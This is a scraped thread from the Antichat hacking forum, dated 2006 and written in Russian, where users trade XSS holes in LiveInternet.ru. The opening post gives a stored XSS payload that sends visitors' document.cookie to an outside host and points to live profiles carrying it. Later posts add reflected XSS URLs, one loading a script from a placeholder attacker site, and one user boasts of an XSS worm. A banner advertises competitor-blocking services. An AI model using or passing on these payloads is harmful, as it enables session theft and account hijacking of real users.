XSS в дневнике LiveInternet.ru

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
XSS в дневнике LiveInternet.ru

Страница 1 из 3

Опции темы

Поиск в этой теме

Опции просмотра

XSS в дневнике LiveInternet.ru

13.12.2006, 12:10

InferNo23

Участник форума

Регистрация: 05.09.2006

Сообщений: 187

С нами: 10358246

Репутация: 378

XSS в дневнике LiveInternet.ru

Вот нашол активную xss:
когда регимся, вводим в поле "О новом дневнике - в двух словах"

Код:

<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

.
потом все кто помотрит ваш профиль отдаст куки...
Примеры:
http://www.liveinternet.ru/users/hello2all/profile/ - тут отдадите куки
http://www.liveinternet.ru/users/nokia1/profile/ - алерт.

𝕏 Twitter Reddit Telegram Копировать ссылку

13.12.2006, 19:30

-FARAON2005RAMSES-

Познающий

Регистрация: 06.10.2006

Сообщений: 59

С нами: 10312978

Репутация: 9

Отправить сообщение для -FARAON2005RAMSES- с помощью MSN

О! санкс! всё пашет!

13.12.2006, 19:34

DimOnOID

Постоянный

Регистрация: 05.12.2006

Сообщений: 477

С нами: 10226672

Репутация: 441

да..+ тебе )))
хотя уже пол года назад знал.....там ваще админы тупят...

14.12.2006, 19:23

slider

Members of Antichat - Level 5

Регистрация: 04.09.2005

Сообщений: 528

С нами: 10885346

Репутация: 2947

http://www.liveinternet.ru/journal_register.php
Поле:*Подтвердить пароль:
не фильтруется!

14.12.2006, 20:06

†Romi4†

Постоянный

Регистрация: 06.02.2006

Сообщений: 409

С нами: 10662086

Репутация: 555

)) прикольно,лови +

15.12.2006, 02:54

~~Petr~~

Banned

Регистрация: 10.06.2006

Сообщений: 938

С нами: 10483586

Репутация: 1223

Туплю, не нашел этот пункт

Именно где он? Я по новой не регился, я именно хотел бы узнать где он в настройках, + у других в пофиле такого тоже не увидел, Черт не дружу я с таких типов сайтами

Последний раз редактировалось Sandjuro; 15.12.2006 в 02:56..

22.12.2006, 16:50

-FARAON2005RAMSES-

Познающий

Регистрация: 06.10.2006

Сообщений: 59

С нами: 10312978

Репутация: 9

именно поэтому ты и не нашёл этот пунктик.
Надо региться заного, тогда найдёшь.

22.12.2006, 19:20

Zadoxlik

Постоянный

Регистрация: 28.02.2005

Сообщений: 853

С нами: 11156006

Репутация: 749

Пишите Xss вирус =) Мой для ливжурнала помог пользователям получить красивые доменчики третего уровня для своих ЖЖ =)

22.12.2006, 20:37

*D1VER

Участник форума

Регистрация: 05.12.2006

Сообщений: 112

С нами: 10227581

Репутация: 175

http://market.liveinternet.ru/index.php?id=10091&page=1&vendor=0&sort=2&sortorde r=1&pricelo=10%22%3E%3Cscript%3Ealert()%3C/script%3E0

Пассивная ХSS почти там же!

#10

28.12.2006, 12:52

ReanimatoR

Участник форума

Регистрация: 27.08.2006

Сообщений: 223

С нами: 10371202

Репутация: 341

PASSIVE XSS при реге счетчиков
http://www.liveinternet.ru/add/add/?rules=agreed&www=&type=site&random=1113854391&url =http%3A%2F%2Flalala.2u2r%2F&aliases=&name="><scri pt src=http://ТВОЙСАЙТ.ru/js.js></script>&email=123%40123.123&password=mikmik&check= mikmik&keywords=&private=&subscribe=on&group=ru&gr oup=ru%2Fauto&ok=+%E4%E0%EB%FC%F8%E5+%3E%3E+

Страница 1 из 3

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Энциклопедия уязвимых скриптов	DIAgen	Веб-уязвимости	519	23.09.2021 11:44
Xss для новичков	Micr0b	Уязвимости	79	06.07.2018 22:05
XSS worms	Xex	Статьи	0	02.10.2006 01:49

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Создать сделку

Мои сделки

Сделка